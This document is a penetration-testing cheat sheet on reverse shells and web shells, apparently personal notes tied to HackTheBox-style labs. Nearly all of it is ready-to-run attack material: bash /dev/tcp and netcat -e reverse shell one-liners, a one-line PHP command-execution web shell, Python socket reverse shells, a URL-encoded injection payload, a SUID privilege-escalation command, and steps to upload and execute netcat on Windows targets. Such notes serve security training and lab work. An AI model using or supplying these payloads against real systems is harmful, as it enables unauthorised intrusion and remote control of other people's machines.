# Shells

## Links

* Web
  * [gtfobins.github.io](https://gtfobins.github.io)
  * [PentestMonkey.net\_ReverseShells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
  * [Reverse Shell Generator: Suggestion Tool](https://github.com/mthbernardes/rsg)
  * [Reverse-shells-one-liners](http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html)
* Gitbook
  * [MetasploitVenom](https://pentest.mxhx.org/03-metasploit#venom)
  * [PrivEscVenom](https://pentest.mxhx.org/07-win-privesc/win-privesc#basic-venom-reverse-shell)
  * [FtpHttpVulnWebshell](https://pentest.mxhx.org/ftp#ftphttp-vulnerability)

## Basics

* Host: Setup the listener to catch the reverse shell
  * nc -nvlp 1234
* Target: Upload your reverse shell, navigate, execute, connect
  * [http://rhost/404.php](http://192.168.50.102/404.php)
* Example: BashedHTB sends a **php reverse shell** with wget

## Easy Test Connect

```
nc -e /bin/bash $IP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1

nc -nlvp 4444
```

## PHP web shell

* Upload this simple 'shell.php', and call it using parameter 'cmd=uname'
* Consider, you might need to send 'shell.php3' to avoid the block/filter.
* REF: [PhpTricks](https://pentest.mxhx.org/04-webapps/php-tricks), [FtpHttpVuln](https://pentest.mxhx.org/ftp#scenario-ftp-http)

```
<?php
  system($_GET["cmd"]);
?>

Execute:
http://abc.so/upload/shell.php?cmd=uname -a
```

## Python

```
#!/usr/bin/env python
import os
import sys
try: 
    #os.system('/usr/bin/touch /tmp/hello')              ...test
    #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1')       ...reverse shell
    os.system('chmod 4755 /bin/dash')                    ...rootbash
except:
    sys.exit()
```

```python
This worked for htb-bashed:
Root process auto-executes python scripts:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
```

```
Script:
http://10.10.10.168:8080/

import socket,subprocess,os bs; 
socket.socket(socket.AF_INET,socket.SOCK_STREAM);
ns.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")# 
HTTP/1.1



Bash Script/Shell (privesc)

#!/usr/bin/python
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

```

#### By Burp

```
Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#

Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
```

#### Browser

```
http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
--Remember to include the HTTP/1.1
```

## Bash Reverse

* REF: [ApacheJamesEmail](https://pentest.mxhx.org/04-webapps/apache#apache-james-server-2-3-2)

```
bash -i >& /dev/tcp/192.168.1.26/53 0>&1

payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'
```

## Powershell Reverse

* [WindowsPrivEsc-Powershell](https://pentest.mxhx.org/07-win-privesc/win-kernelexp#juicy-potato-powershell)

## netcat

* Create a python reverse shell
* Listener #1: Share rshell with <
* Listener #2: Wait for incoming
* LFI: Execute nc to pickup rshell and execute it

```
rce > nc > python > nc/rshell

Python Reverse Shell
vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!
```

## Windows netcat

* Windows Target might not have netcat
* Download and send the nc64.exe (assuming they are using 64bit)
* Execute your nc64.exe to send a ReverseShell[ ](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php)back to yourself
* Ex: [DrupalPhpVuln](https://pentest.mxhx.org/04-webapps/drupal#reverse)

```
Download 64-bit netcat
nc64.exe: upload and execute

http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081
nc -nvlp 8081
```

##